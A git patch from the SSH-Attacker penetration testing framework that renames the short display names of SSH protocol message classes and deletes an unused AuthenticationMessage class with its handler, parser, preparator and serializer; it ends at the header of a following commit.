ShortStringNames --- .../core/layer/impl/SSH2Layer.java | 5 - .../handler/AuthenticationMessageHandler.java | 38 ------ .../message/AuthenticationMessage.java | 126 ------------------ .../message/UserAuthBannerMessage.java | 2 +- .../message/UserAuthFailureMessage.java | 2 +- .../message/UserAuthInfoRequestMessage.java | 2 +- .../message/UserAuthPasswordMessage.java | 2 +- .../message/UserAuthPkOkMessage.java | 2 +- .../message/UserAuthPubkeyMessage.java | 2 +- .../parser/AuthenticationMessageParser.java | 45 ------- .../AuthenticationMessagePreparator.java | 41 ------ .../AuthenticationMessageSerializer.java | 41 ------ .../message/ChannelCloseMessage.java | 2 +- .../message/ChannelDataMessage.java | 2 +- .../connection/message/ChannelEofMessage.java | 2 +- .../message/ChannelExtendedDataMessage.java | 2 +- .../ChannelOpenConfirmationMessage.java | 2 +- .../message/ChannelOpenFailureMessage.java | 2 +- .../message/ChannelOpenMessage.java | 5 + .../message/ChannelRequestMessage.java | 3 + .../message/ChannelWindowAdjustMessage.java | 2 +- .../message/GlobalRequestFailureMessage.java | 2 +- .../message/GlobalRequestMessage.java | 5 + .../message/GlobalRequestSuccessMessage.java | 2 +- .../transport/message/DebugMessage.java | 2 +- .../message/DhKeyExchangeInitMessage.java | 2 +- .../message/DhKeyExchangeReplyMessage.java | 2 +- .../transport/message/NewKeysMessage.java | 2 +- .../message/ServiceAcceptMessage.java | 2 +- .../message/ServiceRequestMessage.java | 2 +- .../message/UnimplementedMessage.java | 2 +- 31 files changed, 35 insertions(+), 318 deletions(-) delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/AuthenticationMessageHandler.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/AuthenticationMessage.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/AuthenticationMessageParser.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/preparator/AuthenticationMessagePreparator.java delete mode 100644 SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/AuthenticationMessageSerializer.java diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java index da8775055..f388c1637 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/layer/impl/SSH2Layer.java @@ -773,11 +773,6 @@ private void readNewKeysProtocolData() { readDataContainer(message, context); } - private void readAuthenticationProtocolData() { - AuthenticationMessage message = new AuthenticationMessage(); - readDataContainer(message, context); - } - private void readKexInitProtocolData() { KeyExchangeInitMessage message = new KeyExchangeInitMessage(); readDataContainer(message, context); diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/AuthenticationMessageHandler.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/AuthenticationMessageHandler.java deleted file mode 100644 index 7bac1e298..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/handler/AuthenticationMessageHandler.java +++ /dev/null @@ -1,38 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.protocol.authentication.handler; - -import de.rub.nds.modifiablevariable.util.ArrayConverter; -import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.protocol.authentication.message.AuthenticationMessage; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageHandler; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -public class AuthenticationMessageHandler extends ProtocolMessageHandler { - - private static final Logger LOGGER = LogManager.getLogger(); - - public AuthenticationMessageHandler(SshContext context) { - super(context); - } - - @Override - public void adjustContext(AuthenticationMessage message) { - sshContext.setLastHandledApplicationMessageData(message.getData().getValue()); - String readableAppData = - ArrayConverter.bytesToHexString( - sshContext.getLastHandledAuthenticationMessageData()); - if (sshContext.getTalkingConnectionEndType() - == sshContext.getChooser().getMyConnectionPeer()) { - LOGGER.debug("Received Data:" + readableAppData); - } else { - LOGGER.debug("Send Data:" + readableAppData); - } - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/AuthenticationMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/AuthenticationMessage.java deleted file mode 100644 index fee7ade82..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/AuthenticationMessage.java +++ /dev/null @@ -1,126 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.protocol.authentication.message; - -import de.rub.nds.modifiablevariable.ModifiableVariableProperty; -import de.rub.nds.modifiablevariable.bytearray.ModifiableByteArray; -import de.rub.nds.modifiablevariable.util.ArrayConverter; -import de.rub.nds.modifiablevariable.util.UnformattedByteArrayAdapter; -import de.rub.nds.sshattacker.core.layer.context.SshContext; -import de.rub.nds.sshattacker.core.protocol.authentication.handler.AuthenticationMessageHandler; -import de.rub.nds.sshattacker.core.protocol.authentication.parser.AuthenticationMessageParser; -import de.rub.nds.sshattacker.core.protocol.authentication.preparator.AuthenticationMessagePreparator; -import de.rub.nds.sshattacker.core.protocol.authentication.serializer.AuthenticationMessageSerializer; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessage; -import jakarta.xml.bind.annotation.adapters.XmlJavaTypeAdapter; -import java.io.InputStream; -import java.util.Arrays; - -public class AuthenticationMessage extends ProtocolMessage { - @XmlJavaTypeAdapter(UnformattedByteArrayAdapter.class) - private byte[] dataConfig = null; - - @ModifiableVariableProperty private ModifiableByteArray data; - - public AuthenticationMessage(byte[] dataConfig) { - super(); - this.dataConfig = dataConfig; - } - - public AuthenticationMessage() { - super(); - } - - public ModifiableByteArray getData() { - return data; - } - - public void setData(ModifiableByteArray data) { - this.data = data; - } - - public void setData(byte[] data) { - if (this.data == null) { - this.data = new ModifiableByteArray(); - } - this.data.setOriginalValue(data); - } - - public byte[] getDataConfig() { - return dataConfig; - } - - public void setDataConfig(byte[] dataConfig) { - this.dataConfig = dataConfig; - } - - @Override - public String toString() { - StringBuilder sb = new StringBuilder(); - sb.append("ApplicationMessage:"); - sb.append("\n Data: "); - if (data != null && data.getValue() != null) { - sb.append(ArrayConverter.bytesToHexString(data.getValue())); - } else { - sb.append("null"); - } - return sb.toString(); - } - - @Override - public String toCompactString() { - return "APPLICATION"; - } - - @Override - public String toShortString() { - return "APP"; - } - - @Override - public AuthenticationMessageHandler getHandler(SshContext sshContext) { - return new AuthenticationMessageHandler(sshContext); - } - - @Override - public AuthenticationMessageParser getParser(SshContext sshContext, InputStream stream) { - return new AuthenticationMessageParser(stream); - } - - @Override - public AuthenticationMessagePreparator getPreparator(SshContext sshContext) { - return new AuthenticationMessagePreparator(sshContext.getChooser(), this); - } - - @Override - public AuthenticationMessageSerializer getSerializer(SshContext sshContext) { - return new AuthenticationMessageSerializer(this); - } - - @Override - public int hashCode() { - int hash = 7; - hash = 43 * hash + Arrays.hashCode(this.dataConfig); - return hash; - } - - @Override - public boolean equals(Object obj) { - if (this == obj) { - return true; - } - if (obj == null) { - return false; - } - if (getClass() != obj.getClass()) { - return false; - } - final AuthenticationMessage other = (AuthenticationMessage) obj; - return Arrays.equals(this.dataConfig, other.dataConfig); - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthBannerMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthBannerMessage.java index c94164b74..f2c8697c3 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthBannerMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthBannerMessage.java @@ -132,6 +132,6 @@ public UserAuthBannerMessageParser getParser(SshContext sshContext, InputStream @Override public String toShortString() { - return "AUTHBANNER"; + return "USERAUTH_BANNER"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthFailureMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthFailureMessage.java index 5beb28883..e6e51af35 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthFailureMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthFailureMessage.java @@ -159,6 +159,6 @@ public UserAuthFailureMessageSerializer getSerializer(SshContext context) { @Override public String toShortString() { - return "AUTHFAIL"; + return "USERAUTH_FAILURE"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthInfoRequestMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthInfoRequestMessage.java index c6f0f0e7f..0ffcd25ac 100755 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthInfoRequestMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthInfoRequestMessage.java @@ -204,6 +204,6 @@ public UserAuthInfoRequestMessageSerializer getSerializer(SshContext context) { @Override public String toShortString() { - return "AUTH_INFO_REQUEST"; + return "USERAUTH_REQUEST"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthPasswordMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthPasswordMessage.java index 6ec955460..e4d8392fd 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthPasswordMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthPasswordMessage.java @@ -160,6 +160,6 @@ public UserAuthPasswordMessageSerializer getSerializer(SshContext context) { @Override public String toShortString() { - return "AUTH_PW"; + return "USERAUTH_REQUEST"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthPkOkMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthPkOkMessage.java index 768b99504..5fdc413e2 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthPkOkMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthPkOkMessage.java @@ -132,6 +132,6 @@ public SshMessageSerializer getSerializer(SshContext contex @Override public String toShortString() { - return "AUTH_OK"; + return "USERAUTH_PK_OK"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthPubkeyMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthPubkeyMessage.java index 31fcf6457..ac29ce999 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthPubkeyMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/message/UserAuthPubkeyMessage.java @@ -189,6 +189,6 @@ public UserAuthPubkeyMessageSerializer getSerializer(SshContext context) { @Override public String toShortString() { - return "USERAUTHPUBKEY"; + return "USERAUTH_REQUEST"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/AuthenticationMessageParser.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/AuthenticationMessageParser.java deleted file mode 100644 index 3e5ff46ac..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/parser/AuthenticationMessageParser.java +++ /dev/null @@ -1,45 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.protocol.authentication.parser; - -import de.rub.nds.sshattacker.core.protocol.authentication.message.AuthenticationMessage; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageParser; -import java.io.InputStream; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -public class AuthenticationMessageParser extends ProtocolMessageParser { - - private static final Logger LOGGER = LogManager.getLogger(); - - /** - * Constructor for the Parser class - * - * @param stream Inputstream to Parse the AuthentiactionMessage from - */ - public AuthenticationMessageParser(InputStream stream) { - super(stream); - } - - @Override - public void parse(AuthenticationMessage message) { - LOGGER.debug("Parsing ApplicationMessage"); - parseData(message); - message.setCompleteResultingMessage(getAlreadyParsed()); - } - - /** - * Reads the next bytes as the Data and writes them in the message - * - * @param msg Message to write in - */ - private void parseData(AuthenticationMessage msg) { - msg.setData(parseByteArrayField(getBytesLeft())); - LOGGER.debug("Data: {}", msg.getData().getValue()); - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/preparator/AuthenticationMessagePreparator.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/preparator/AuthenticationMessagePreparator.java deleted file mode 100644 index fc1b53bf0..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/preparator/AuthenticationMessagePreparator.java +++ /dev/null @@ -1,41 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.protocol.authentication.preparator; - -import de.rub.nds.sshattacker.core.protocol.authentication.message.AuthenticationMessage; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessagePreparator; -import de.rub.nds.sshattacker.core.workflow.chooser.Chooser; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -public class AuthenticationMessagePreparator - extends ProtocolMessagePreparator { - private static final Logger LOGGER = LogManager.getLogger(); - - private final AuthenticationMessage msg; - - public AuthenticationMessagePreparator(Chooser chooser, AuthenticationMessage message) { - super(chooser, message); - this.msg = message; - } - - @Override - protected void prepareProtocolMessageContents() { - LOGGER.debug("Preparing ApplicationMessage"); - prepareData(msg); - } - - private void prepareData(AuthenticationMessage msg) { - if (msg.getDataConfig() != null) { - msg.setData(msg.getDataConfig()); - } else { - msg.setData(chooser.getLastHandledAuthenticationMessageData()); - } - LOGGER.debug("Data: {}", msg.getData().getValue()); - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/AuthenticationMessageSerializer.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/AuthenticationMessageSerializer.java deleted file mode 100644 index d4200f4c1..000000000 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/authentication/serializer/AuthenticationMessageSerializer.java +++ /dev/null @@ -1,41 +0,0 @@ -/* - * SSH-Attacker - A Modular Penetration Testing Framework for SSH - * - * Copyright 2014-2023 Ruhr University Bochum, Paderborn University, and Hackmanit GmbH - * - * Licensed under Apache License 2.0 http://www.apache.org/licenses/LICENSE-2.0 - */ -package de.rub.nds.sshattacker.core.protocol.authentication.serializer; - -import de.rub.nds.sshattacker.core.protocol.authentication.message.AuthenticationMessage; -import de.rub.nds.sshattacker.core.protocol.common.ProtocolMessageSerializer; -import org.apache.logging.log4j.LogManager; -import org.apache.logging.log4j.Logger; - -public class AuthenticationMessageSerializer - extends ProtocolMessageSerializer { - - private static final Logger LOGGER = LogManager.getLogger(); - - /** - * Constructor for the ApplicationMessageSerializer - * - * @param message Message that should be serialized - */ - public AuthenticationMessageSerializer(AuthenticationMessage message) { - super(message); - } - - @Override - protected byte[] serializeBytes() { - LOGGER.debug("Serializing ApplicationMessage"); - writeData(); - return getAlreadySerialized(); - } - - /** Writes the data of the ApplicationMessage into the final byte[] */ - private void writeData() { - appendBytes(message.getData().getValue()); - LOGGER.debug("Data: {}", message.getData().getValue()); - } -} diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelCloseMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelCloseMessage.java index a4bfbae62..4712641df 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelCloseMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelCloseMessage.java @@ -38,6 +38,6 @@ public ChannelCloseMessageParser getParser(SshContext sshContext, InputStream st @Override public String toShortString() { - return "CHAN_CLOSE"; + return "CHANNEL_CLOSE"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelDataMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelDataMessage.java index 4c348fd66..4affc49c1 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelDataMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelDataMessage.java @@ -82,6 +82,6 @@ public ChannelDataMessageSerializer getSerializer(SshContext context) { @Override public String toShortString() { - return "CHANDAT"; + return "CHANNEL_DATA"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelEofMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelEofMessage.java index be66fe9d2..28b879a9a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelEofMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelEofMessage.java @@ -38,6 +38,6 @@ public ChannelMessageSerializer getSerializer(SshContext cont @Override public String toShortString() { - return "CHAN_EOF"; + return "CHANNEL_EOF"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelExtendedDataMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelExtendedDataMessage.java index f060c1f0c..419411ea0 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelExtendedDataMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelExtendedDataMessage.java @@ -108,6 +108,6 @@ public ChannelExtendedDataMessageSerializer getSerializer(SshContext context) { @Override public String toShortString() { - return "CHANEXTEND"; + return "CHANNEL_EXTENDED_DATA"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelOpenConfirmationMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelOpenConfirmationMessage.java index 54c26fe34..cb4b0f961 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelOpenConfirmationMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelOpenConfirmationMessage.java @@ -81,6 +81,6 @@ public ChannelOpenConfirmationMessageSerializer getSerializer(SshContext context @Override public String toShortString() { - return "CHANNEL_OPEN"; + return "CHANNEL_OPEN_CONFIRMATION"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelOpenFailureMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelOpenFailureMessage.java index 9162af364..d027f3c6d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelOpenFailureMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelOpenFailureMessage.java @@ -140,6 +140,6 @@ public ChannelOpenFailureMessageSerializer getSerializer(SshContext context) { @Override public String toShortString() { - return "OPENFAIL"; + return "CHANNEL_OPEN_FAILURE"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelOpenMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelOpenMessage.java index 342f2c334..600b9a452 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelOpenMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelOpenMessage.java @@ -119,4 +119,9 @@ public Integer getConfigSenderChannelId() { public void setConfigSenderChannelId(int configSenderChannelId) { this.configSenderChannelId = configSenderChannelId; } + + @Override + public String toShortString() { + return "CHANNEL_OPEN"; + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestMessage.java index 43ce7ed75..431051564 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelRequestMessage.java @@ -86,4 +86,7 @@ public void setWantReply(byte wantReply) { public void setWantReply(boolean wantReply) { setWantReply(Converter.booleanToByte(wantReply)); } + + @Override + public String toShortString(){return "CHANNEL_REQUEST";} } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelWindowAdjustMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelWindowAdjustMessage.java index 552ed01d9..63c7e3593 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelWindowAdjustMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/ChannelWindowAdjustMessage.java @@ -54,7 +54,7 @@ public ChannelWindowAdjustMessageSerializer getSerializer(SshContext context) { @Override public String toShortString() { - return "CH_WINDOW_ADJ"; + return "CHANNEL_WINDOW_ADJUST"; } @Override diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestFailureMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestFailureMessage.java index 78f1430dc..2e5247b2f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestFailureMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestFailureMessage.java @@ -38,6 +38,6 @@ public GlobalRequestFailureMessageSerializer getSerializer(SshContext context) { @Override public String toShortString() { - return "REQ_FAILURE"; + return "REQUEST_FAILURE"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestMessage.java index da3187480..cc25a673a 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestMessage.java @@ -82,4 +82,9 @@ public void setWantReply(ModifiableByte wantReply) { public void setWantReply(byte wantReply) { this.wantReply = ModifiableVariableFactory.safelySetValue(this.wantReply, wantReply); } + + @Override + public String toShortString() { + return "GLOBAL_REQUEST"; + } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestSuccessMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestSuccessMessage.java index b764de6b7..5fdc3b37b 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestSuccessMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/connection/message/GlobalRequestSuccessMessage.java @@ -40,6 +40,6 @@ public SshMessageSerializer getSerializer(SshContex @Override public String toShortString() { - return "REQ_SUCCESS"; + return "REQUEST_SUCCESS"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DebugMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DebugMessage.java index 433b99a89..5fb6123d6 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DebugMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DebugMessage.java @@ -148,6 +148,6 @@ public DebugMessageSerializer getSerializer(SshContext context) { @Override public String toShortString() { - return "DEBUG_MSG"; + return "DEBUG"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DhKeyExchangeInitMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DhKeyExchangeInitMessage.java index 4ece6b32c..6a13e835d 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DhKeyExchangeInitMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DhKeyExchangeInitMessage.java @@ -90,6 +90,6 @@ public DhKeyExchangeInitMessageSerializer getSerializer(SshContext context) { @Override public String toShortString() { - return "DHgKexInit"; + return "KEXDH_INIT"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DhKeyExchangeReplyMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DhKeyExchangeReplyMessage.java index cbabe8399..713effdf6 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DhKeyExchangeReplyMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/DhKeyExchangeReplyMessage.java @@ -199,6 +199,6 @@ public SshMessageSerializer getSerializer(SshContext @Override public String toShortString() { - return "DHkeyExchangeRepl"; + return "KEXDH_REPLY"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/NewKeysMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/NewKeysMessage.java index df00f3bf5..6228b996f 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/NewKeysMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/NewKeysMessage.java @@ -39,6 +39,6 @@ public NewKeysMessageSerializer getSerializer(SshContext context) { @Override public String toShortString() { - return "NEW_KEYS"; + return "NEWKEYS"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/ServiceAcceptMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/ServiceAcceptMessage.java index 5e9136857..e9b0eeb6c 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/ServiceAcceptMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/ServiceAcceptMessage.java @@ -96,6 +96,6 @@ public ServiceAcceptMessageSerializer getSerializer(SshContext context) { @Override public String toShortString() { - return "SVC_ACCEPT"; + return "SERVICE_ACCEPT"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/ServiceRequestMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/ServiceRequestMessage.java index 9507289b3..99bdc58c7 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/ServiceRequestMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/ServiceRequestMessage.java @@ -96,6 +96,6 @@ public ServiceRequestMessageSerializer getSerializer(SshContext context) { @Override public String toShortString() { - return "SVC_REQ"; + return "SERVICE_REQUEST"; } } diff --git a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/UnimplementedMessage.java b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/UnimplementedMessage.java index 48034ae2f..f4cf3da07 100644 --- a/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/UnimplementedMessage.java +++ b/SSH-Core/src/main/java/de/rub/nds/sshattacker/core/protocol/transport/message/UnimplementedMessage.java @@ -56,6 +56,6 @@ public UnimplementedMessageSerializer getSerializer(SshContext context) { @Override public String toShortString() { - return "UNIMPLEMENTED_MESSAGE"; + return "UNIMPLEMENTED"; } } From bdec7c9bc2f95c125b73d04def0fb9cdde17f80b Mon Sep 17 00:00:00 2001 From: Steffen Brossler Date: Sat, 12 Aug 2023 01:04:14 +0200 Subject: [PATCH 057/176] REV: Change EndOfStreamException to extend EOFException --- .../core/exceptions/EndOfStreamException.java | 20 +++---------------- .../core/layer/impl/PacketLayer.java | 2 ++ .../core/layer/impl/SSH2Layer.java | 2 -- .../message/ChannelRequestMessage.java | 4 +++- 4 